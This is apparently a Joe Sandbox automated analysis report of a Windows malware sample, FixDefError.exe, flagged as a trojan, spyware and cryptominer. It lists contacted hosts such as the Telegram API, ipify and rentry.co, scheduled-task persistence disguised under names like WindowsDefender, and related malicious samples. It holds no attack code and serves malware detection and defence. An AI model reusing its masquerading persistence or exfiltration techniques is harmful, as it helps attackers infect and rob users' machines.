                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://dynamic.tsvchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://raw.githubusercontent.comProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://raw.githubusercontent.comProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000043.00000002.322850699.000001CFFD829000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://xmrig.com/benchmark/%ssvhost.exe.1.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.fontbureau.com-sProgramStarter.exe, 00000001.00000003.255875959.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256014070.0000000007F12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000043.00000003.318327858.000001CFFD84A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.fontbureau.com/designersGFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designers/?FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.founder.com.cn/cn/bTheFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designersJProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.fontbureau.com/designers?FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://github.comProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.carterandcone.comamsFixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.tiro.comFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253314357.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.goodfont.co.krFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.carterandcone.comFixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253083653.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.typography.netDFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000043.00000002.322850699.000001CFFD829000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://github.comProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.galapagosdesign.com/staff/dennis.htmFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://fontfabrik.comFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://api.telegram.org4ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://www.fontbureau.com/designersmProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.tiro.comlic;FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		low
                                                                                            http://www.fontbureau.com/designersaFixDefError.exe, 00000000.00000003.271991817.000000000867C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.fontbureau.com773.ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://github.com4ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://www.google.comProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.fonts.comFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.sandoll.co.krFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://apis.google.comProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.urwpp.deFixDefError.exe, 00000000.00000003.256592203.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256719673.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256707046.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://www.sakkal.comFixDefError.exe, 00000000.00000003.254806233.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254862842.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254771694.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254676957.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254697046.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254834071.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254615093.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254648692.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.fontbureau.com/designerssProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.sandoll.co.kreVFixDefError.exe, 00000000.00000003.251806993.0000000008685000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.apache.org/licenses/LICENSE-2.0FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.fontbureau.comFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.agfamonotype.FixDefError.exe, 00000000.00000003.271991817.000000000867C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.tiro.comuFixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://xmrig.com/wizard%ssvhost.exe.1.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.fontbureau.com/designers/frere-jones.ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.urwpp.deFFixDefError.exe, 00000000.00000003.256576400.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256691395.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256604586.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256592203.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256719673.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256707046.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown

                                                                                                                  World Map of Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public IPs

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  149.154.167.220
                                                                                                                  		api.telegram.orgUnited Kingdom
                                                                                                                  		62041TELEGRAMRUfalse
                                                                                                                  142.251.209.36
                                                                                                                  		www.google.comUnited States
                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                  104.237.62.211
                                                                                                                  		api4.ipify.orgUnited States
                                                                                                                  		18450WEBNXUSfalse
                                                                                                                  198.251.88.130
                                                                                                                  		rentry.coUnited States
                                                                                                                  		53667PONYNETUSfalse
                                                                                                                  140.82.121.3
                                                                                                                  		github.comUnited States
                                                                                                                  		36459GITHUBUSfalse
                                                                                                                  185.199.111.133
                                                                                                                  		raw.githubusercontent.comNetherlands
                                                                                                                  		54113FASTLYUSfalse

                                                                                                                  Private

                                                                                                                  IP
                                                                                                                  192.168.2.1

                                                                                                                  General Information

                                                                                                                  Joe Sandbox Version:37.0.0 Beryl
                                                                                                                  Analysis ID:829697
                                                                                                                  Start date and time:2023-03-19 00:16:08 +01:00
                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                  Overall analysis duration:0h 10m 41s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                  Number of analysed new started processes analysed:77
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • HDC enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample file name:FixDefError.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.adwa.spyw.evad.mine.winEXE@108/25@10/7
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  HDC Information:Failed
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 95%
                                                                                                                  • Number of executed functions: 140
                                                                                                                  • Number of non-executed functions: 7
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                  Warnings

                                                                                                                  • Exclude process from analysis (whitelisted): Conhost.exe, RuntimeBroker.exe
                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, pool.hashvault.pro
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  TimeTypeDescription
                                                                                                                  00:17:17Task SchedulerRun new task: AntiMalwareServiceExecutable path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:17Task SchedulerRun new task: MicrosoftEdgeUpd path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:17Task SchedulerRun new task: RuntimeBroker path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:17Task SchedulerRun new task: SecurityHealthSystray path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:18Task SchedulerRun new task: WindowsDefender path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:18Task SchedulerRun new task: WmiPrvSE path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:22Task SchedulerRun new task: ActivationRuntime path: C:\ProgramData\RuntimeBrokerData\RegSvc.exe
                                                                                                                  00:17:22Task SchedulerRun new task: NvStray path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:22API Interceptor2x Sleep call for process: ProgramStarter.exe modified
                                                                                                                  00:17:23Task SchedulerRun new task: OneDriveService path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:23Task SchedulerRun new task: Agent Activation RuntimeServices_bk903 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:23Task SchedulerRun new task: AntiMalwareSericeExecutableServices_bk64 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:23Task SchedulerRun new task: MicrosoftUpdateServicesServices_bk620 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:23Task SchedulerRun new task: SettingSysHostServices_bk248 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:24Task SchedulerRun new task: WindowsDefenderServicesServices_bk697 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:26Task SchedulerRun new task: ActivationRule path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:18:25API Interceptor23x Sleep call for process: powershell.exe modified

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  149.154.167.220doc10010679052382012143717.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                    EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                        2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          iubK8Ka7o7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            Bank_Slip-_701536.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                              YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                Bestellung_(PO4703392)_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                  Parts.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    DHL_Original_Document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                      e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                        Dn4GujmGOF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          Inv-67383728 [Reference Nr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            purchase_order.exeGet hashmaliciousBluStealer, ThunderFox Stealer, a310LoggerBrowse
                                                                                                                                              3_Hire_Invoice_CP_March_15_2023_pdf.exeGet hashmaliciousVector Stealer, zgRATBrowse
                                                                                                                                                Aging Report.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  New_Order_Match_2023SI33490.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                    F4Ue8fwolG.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                      Aging Report.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        Focwlwxqtn.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                          104.237.62.211main.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                                            EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                              YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                VCO00IddkzE1Fea.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                  Parts.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    ARRIVAL_NOTICE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                      e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                        Dn4GujmGOF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          XOuNd4W6e6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            Inv-67383728 [Reference Nr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              Attachment.zipGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                  AgFFEB6EnKoRWk6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    invoice_and_packing_List.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                      PTT_PAKET#U0130N#U0130Z#U0130_TESL#U0130M_ED#U0130YOR.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                        SST_Statement-_Feb_2023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                          BANK_INSTRUCTIONS.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                            Invoice_&_Packing_list.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                              FAX_20230315_1678736649_753_20230315_1678736649_753_20230315_1678736649_753.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                wH6Ft5wweX.exeGet hashmaliciousAgentTeslaBrowse

                                                                                                                                                                                                  Domains

                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  github.comsetup.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  doc08611720230316153221.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                  • 140.82.121.4
                                                                                                                                                                                                  doc08611720230316153221.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  Invoice_No._102220034.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  Order_Requirement_RES0.08-180.jarGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  Invoice_No._102220034.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                  • 140.82.121.4
                                                                                                                                                                                                  file.exeGet hashmaliciousCryptbot, MinerDownloader, RedLine, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                  • 140.82.121.4
                                                                                                                                                                                                  Invoice_No._102220034.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 140.82.121.4
                                                                                                                                                                                                  Invoice_No._102220034.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                  • 140.82.121.4
                                                                                                                                                                                                  jX6QwR9B.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                  • 140.82.121.4
                                                                                                                                                                                                  SecuriteInfo.com.Heur.Bodegun.3.22512.2082.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 140.82.121.4
                                                                                                                                                                                                  Doc_0320877023.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  Doc_0320877023.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                  • 140.82.121.4
                                                                                                                                                                                                  https://github.com/MatthewPierson/Vieux/archive/refs/heads/master.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 140.82.121.10
                                                                                                                                                                                                  aRJp7d4htx.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                                                                                                                                                                                                  • 140.82.121.4
                                                                                                                                                                                                  ZIROD150323.jarGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                  • 140.82.121.4
                                                                                                                                                                                                  RES0.08-1800_Richardson_Electronics.jarGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                  • 140.82.121.4
                                                                                                                                                                                                  ZIROD150323.jarGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  Order_Specification.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  Order_Specification.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  api4.ipify.orgmain.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                                                                                  • 173.231.16.76
                                                                                                                                                                                                  Purchase_Order-0823636.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  V9hBN9tW4H.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  Bestellung_(PO4703392)_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  VCO00IddkzE1Fea.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  DISCOUNT_PRICES.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                                  • 173.231.16.76
                                                                                                                                                                                                  New_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 173.231.16.76
                                                                                                                                                                                                  4EJ3mCLR01kwHtR.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  PURCHASE_CONTRACT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 173.231.16.76
                                                                                                                                                                                                  Parts.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 173.231.16.76
                                                                                                                                                                                                  ARRIVAL_NOTICE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 104.237.62.211
